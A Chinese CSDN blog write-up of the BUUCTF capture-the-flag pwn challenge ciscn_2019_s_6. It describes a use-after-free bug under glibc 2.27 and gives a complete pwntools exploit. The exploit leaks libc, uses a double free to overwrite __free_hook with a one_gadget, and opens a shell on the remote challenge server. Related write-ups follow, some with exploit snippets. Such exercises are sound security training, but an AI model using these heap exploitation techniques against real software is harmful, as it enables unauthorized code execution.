ciscn_2019_s_6

于 2022-03-09 22:07:46 发布
阅读量295 收藏
点赞数 1
分类专栏: buuctf 题目 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzq487782568/article/details/123388829
版权

ciscn_2019_s_6

查看保护
在这里插入图片描述
在这里插入图片描述
漏洞出在了call里面有一个uaf漏洞。直接double free attack即可。
攻击思路:uaf又是libc2.27。所以直接申请0x410泄露出libc和free_hook。再通过double free修改fd为hook,改hook为one_gadget即可getshell。具体的2.27下的double free可以看z1r0’s blog

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './z1r0'

debug = 1
if debug:
    r = remote('node4.buuoj.cn', 27460)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

menu = 'choice:'

def add(size, name, call):
    r.sendlineafter(menu, '1')
    r.sendlineafter("Please input the size of compary's name", str(size))
    r.sendafter('please input name:', name)
    r.sendafter('please input compary call:', call)

def show(index):
    r.sendlineafter(menu, '2')
    r.sendlineafter('Please input the index:', str(index))

def delete(index):
    r.sendlineafter(menu, '3')
    r.sendlineafter('Please input the index:', str(index))


add(0x410, 'aaaa', 'cccc')

add(0x10, 'aaaa', 'ccccc')

add(0x10, 'dddd', 'eeeee')

delete(0)
show(0)

malloc_hook = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00')) - 96 - 0x10
success('malloc_hook = ' + hex(malloc_hook))
libc = ELF('./libc-2.27.so')

libc_base = malloc_hook - libc.sym['__malloc_hook']
free_hook = libc_base + libc.sym['__free_hook']
success('free_hook = ' + hex(free_hook))

delete(1)
delete(1)
delete(1)

add(0x10, p64(free_hook), p64(free_hook))

one = [0x4f2c5, 0x4f322, 0x10a38c]
one_gadget = one[1] + libc_base

add(0x10, p64(one_gadget), p64(one_gadget))

delete(2)

#dbg()

r.interactive()
z1r0.
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
BUUCTF-PWN刷题记录-8
weixin_44145820的博客
04-16 897
目录roarctf_2019_realloc_magic roarctf_2019_realloc_magic
ciscn_2019_s_6(uaf)
m0_51251108的博客
11-16 361
ciscn_2019_s_6: 保护全开 漏洞分析: 指针未清零,存在uaf 大致步骤: 利用unsortbin泄露libc,doublefree劫持free_hook为system exp: from pwn import * local_file = './ciscn_s_6' local_libc = './libc-2.27.so' remote_libc = './libc-2.27.so' select = 1 if select == 0: r = process(local_
ciscn_2019_ne_6(指针未初始化漏洞)
seaaseesa的博客
06-11 580
ciscn_2019_ne_6(指针未初始化漏洞) 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,在delete功能里,ptr指针存在未初始化的漏洞,因此其ptr的值可以通过其他函数来控制,造成任意地址free。 我们可以利用check函数来控制ptr未初始化之前的值 然后构造double free,劫持free_hook即可。 #coding:utf8 from pwn import * #sh = process('./ciscn_2019_ne_6') sh =
c语言 double free,写代码常见的两个安全问题
weixin_39977488的博客
05-19 804
写代码需要时刻考虑代码的安全性,昨天看了代码中容易出现的两个安全问题,在此记录一下。缓冲区溢出在C语言中,定义一个数组如:char str[100];,这里分配了100个字节的内存(缓冲区)供我们使用,当我们的代码中出现str[200]='1';时,这其实就是一个缓冲区溢出,我们修改了未分配给我们使用的内存中的内容。在C中是不检查数组下标越界的情况(当然如果程序非法修改了其他程序的内存,一般操作系...
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:...
ciscn_2021_game
06-23
2021年国赛的pwn题,虚拟机类型的题目,分析起来比较有难度。
ciscn_2021_silverwolf.zip
05-18
2021第十四届全国大学生信息安全竞赛pwn题。
ciscn-2019-pwn
11-29
【标题】"ciscn-2019-pwn"是一个与网络安全竞赛相关的主题,尤其聚焦于"Pwn"类别,这通常指的是破解或利用程序漏洞来获取系统控制权的挑战。2019年的CISCN(中国互联网安全大会)可能是这个挑战的背景,它是一个汇集...
ciscn_2021_lonelywolf.zip
05-17
【标题解析】:“ciscn_2021_lonelywolf.zip”这个文件名暗示了这是一个与2021年全国大学生信息安全竞赛相关的资源,其中“ciscn”可能代表了“Chinese Internet Security Contest”,而“lonelywolf”可能是该竞赛...
ciscn_2019_s_4
doudoudedi
01-26 994
可以看到有栈溢出的漏洞能过控制执行流 exp: #!/usr/bin/python2 from pwn import * from LibcSearcher import * local=0 if local==1: p=process('./ciscn_s_4') elf=ELF('./ciscn_s_4') #libc=elf.libc else: p=remo...
pwnciscn_2019_s_3
Nothing
12-14 4523
这题是全国大学生信息安全竞赛的一道线下半决赛题目,好像是华南赛区? 例行检查。 分析程序。 vul函数 两个系统调用,一个是sys_read,一个是sys_write,往栈上写数据(0x400),从栈上读数据(0x30),存在栈溢出。 还有一个gadget函数。 有两个值得注意的地方。mov rax,0fh 以及mov rax 59。这两个gadget控制了rax的值,看看这两个是什么系统调用...
gyctf_2020_some_thing_exceting
z1r0的博客
01-20 373
gyctf_2020_some_thing_exceting 查看保护 有uaf flag被存放在了bss段。 放flag的这里的size大小是0x60,在2.23下会检查size的大小是否与fastbin 对应的大小一样。 所以进行fastbin释放时,申请的堆块为0x50即可。fastbin double free attack即可。最后申请0x40的原因是因为0x50对应的fastbin里double free之后会有东西,所以申请其它大小的堆块。 from pwn import * con
[BUUCTF]PWN6——ciscn_2019_c_1
mcmuyanga的博客
08-25 6985
[BUUCTF]PWN6——ciscn_2019_c_1 题目网址:https://buuoj.cn/challenges#ciscn_2019_c_1 步骤: 例行检查,64位,开启了nx保护 nc一下,看看输入点的字符串,三个选项加密、解密、退出 用64位ida打开,先是shift+f12查看一下程序里的字符串 没有发现system函数和字符串“bin/sh”,先根据输入点的字符串查看一下主要函数 就像一开始说的程序的功能就是加密和解密,看伪代码可以知道,只有选1的时候才会调用encrypt()
好好说话之Fastbin Attack(1):Fastbin Double Free
hollk’s blog
10-23 2973
好像拖更了好久。。。实在是抱歉。。。。主要是fastbin attack包含了四个部分,后面的例题不知道都对应着哪个方法,所以做完了例题才回来写博客。fastbin attack应该也会分四篇文章分开写。学了这么长时间pwn给我最大的感受就是量变确实可以引起质变,现在做题或者学习新的技术的时候可以隐约的进行以点看面的思考,通过某一处问题会在心里想象可能会引发什么什么样的后果。总的来说不后悔入坑pwn,字节之间的环环相扣让我深深的着迷!
常见堆攻击手段
For Geek
10-10 1559
fastbin利用 smallbin利用 unsortedbin利用 largebin利用
Double free 漏洞复现与利用
vivid_moon的博客
05-29 5616
2018体系结构安全大作业申明:转载请注明出处选题:2015 年 0ctf 题题目描述:提供记事本功能的二进制文件,找出其漏洞,get shell第一章 操作说明为方便老师审核作业,本报告将操作说明放在第一章。操作流程如下:1 、安装 netcat 。2 、安装 pwntools 库。命令: pip install pwntools (安装过程中,一定要保证网络畅通,曾经因为网不好装这个库装了一个...
堆学习——Double Free
qq_41560595的博客
03-10 1212
Double Free,内容如其名,同一个内存块被释放两次。 示例代码 #include <stdio.h> #include <stdlib.h> #include <assert.h> int main() { fprintf(stderr, "This file demonstrates a simple double-free attack with fastbins.\n"); // 分配三个chunk:a、b、c。
ciscn_2019_c_1
最新发布
09-12
根据您提供的引用内容和,题目"ciscn_2019_c_1"是一个涉及到fastbin堆漏洞利用的题目。fastbin是一个堆区的数据结构,用于存储小于等于64字节的空闲块。这个题目的漏洞利用难度不大,适合初学者练习。 根据的代码...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z1r0.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值